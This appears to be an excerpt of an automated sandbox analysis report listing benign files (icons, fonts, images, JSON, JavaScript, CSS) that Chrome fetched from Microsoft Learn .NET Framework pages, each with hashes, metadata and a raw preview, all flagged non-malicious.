                                                                                                                                                                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):5644
                                                                                                                                                                                                                            Entropy (8bit):4.785769732002188
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                                                            MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                                                            SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                                                            SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                                                            SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):19696
                                                                                                                                                                                                                            Entropy (8bit):7.9898910353479335
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                                                                            MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                                                                            SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                                                                            SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                                                                            SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.028616137/styles/docons.56efa28.34a85e0c.woff2
                                                                                                                                                                                                                            Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):17174
                                                                                                                                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):13842
                                                                                                                                                                                                                            Entropy (8bit):7.802399161550213
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                                            MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                                            SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                                            SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                                            SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                                                                            Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (33019), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):33019
                                                                                                                                                                                                                            Entropy (8bit):4.916265462750225
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUcF:5hOEO8chkMet7pCjBfcHkWOzUcF
                                                                                                                                                                                                                            MD5:17339002B4DE90FC5EA0710CA49160CA
                                                                                                                                                                                                                            SHA1:AE771FFC398F8FA8C934FF05A9EBD6CB6D14BA9C
                                                                                                                                                                                                                            SHA-256:D81C792435B93CBAA9A54F59D538121D2EE33B4446359A31D3998D769341F555
                                                                                                                                                                                                                            SHA-512:15127FD515FD2CD55634EEDA71C4F2C96980E6FC51D169771484169104924A176D9387D792D08C7623AC3A44BCF9A00D2DADD6040417892ADB4A542C47B18F2C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):1814504
                                                                                                                                                                                                                            Entropy (8bit):5.501700082361208
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:2xjhHnfpSAjSB1DkCXWQjOAXE2MMge1tae:2DHnhSAjSB1DkCXWQjOWE2ngetP
                                                                                                                                                                                                                            MD5:BA62F9A7D6B293500DBFFBFA6BDC94A6
                                                                                                                                                                                                                            SHA1:8C95BC6054CA865EBCE7A7EF3A51458A8EE2D7A0
                                                                                                                                                                                                                            SHA-256:90499FBA4AEF37D720BF86C3E9784EF58C3679E43F1E0DF7CD93D0213F3A4619
                                                                                                                                                                                                                            SHA-512:BD2C71AB6B887B77F61DCBC3952174A4DC3AB1240C26EAC367F973921076296000F08E13C42F1393B3750D3911A6679CB4E47DE620A6A8229B8708A4C8723B53
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.028616137/scripts/en-us/index-docs.js
                                                                                                                                                                                                                            Preview:"use strict";(()=>{var cve=Object.create;var hT=Object.defineProperty;var A2=Object.getOwnPropertyDescriptor;var dve=Object.getOwnPropertyNames;var uve=Object.getPrototypeOf,pve=Object.prototype.hasOwnProperty;var mve=(e,t,o)=>t in e?hT(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var gve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of dve(t))!pve.call(e,r)&&r!==o&&hT(e,r,{get:()=>t[r],enumerable:!(n=A2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?cve(uve(e)):{},gve(t||!e||!e.__esModule?hT(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?A2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&hT(t,o,r),r};var Yi=(e,t,o)=>(mve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):5644
                                                                                                                                                                                                                            Entropy (8bit):4.785769732002188
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                                                            MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                                                            SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                                                            SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                                                            SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                                                                            Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):35005
                                                                                                                                                                                                                            Entropy (8bit):7.980061050467981
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                                            MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                                            SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                                            SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                                            SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                                                                            Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):4897
                                                                                                                                                                                                                            Entropy (8bit):4.794639101874543
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzVqrpCvJ4QG63JjJ+do88HxbqP:dgQ+KfZcbhaWjp45qtAdflfDOFnNgBy4
                                                                                                                                                                                                                            MD5:84E6C95F0E5378BDA94FA965C4692FAF
                                                                                                                                                                                                                            SHA1:7C1D6572906509B08F8CD7B7A33EB9F9697EE6D1
                                                                                                                                                                                                                            SHA-256:88A4A7B4F1160F8CAD3EB835116C29AC39659D586D4DADC54D9E40AC7E1BC610
                                                                                                                                                                                                                            SHA-512:D34BFF37F8402B4A1FEE3C26F247A86D72666647A10E83D711A1BED1D24C6FC13674D65DCC037C22811B227FEC34B5DE20442191A42F9D78FC79D55FD5792761
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                                                                            Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):72
                                                                                                                                                                                                                            Entropy (8bit):4.241202481433726
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                                            MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                                            SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                                            SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                                            SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):72
                                                                                                                                                                                                                            Entropy (8bit):4.241202481433726
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                                            MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                                            SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                                            SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                                            SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1173007
                                                                                                                                                                                                                            Entropy (8bit):5.503893944397598
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                                                            MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                                                            SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                                                            SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                                                            SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):462984
                                                                                                                                                                                                                            Entropy (8bit):5.0752022731715485
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:XegPrcKCerH5dyUJ6Yh6BFPDxZYX04GK7ML:eKCerXyUM
                                                                                                                                                                                                                            MD5:A788CB941AD6A4D956A4F90DFE94853A
                                                                                                                                                                                                                            SHA1:71043E0FC3738710B6734756CFEDA364CD6CCFC4
                                                                                                                                                                                                                            SHA-256:B114911CB88D10939CC888E04793048A227A0F7B1F01946C2B61C3692FFF9984
                                                                                                                                                                                                                            SHA-512:D9655E5E1E40D20F0210E66E895868C122B2CFECA5C16E44A5BDCC1DF24281016DD679734A622510629D68CEEEDACB96770F0CCC58B4B13C94875B444965076A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.028616137/styles/site-ltr.css
                                                                                                                                                                                                                            Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):33370
                                                                                                                                                                                                                            Entropy (8bit):7.973675198531228
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
                                                                                                                                                                                                                            MD5:6E78EE324E008296108BFCDECD77E318
                                                                                                                                                                                                                            SHA1:F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
                                                                                                                                                                                                                            SHA-256:EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
                                                                                                                                                                                                                            SHA-512:BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/media/event-banners/banner-ignite-2024.jpg
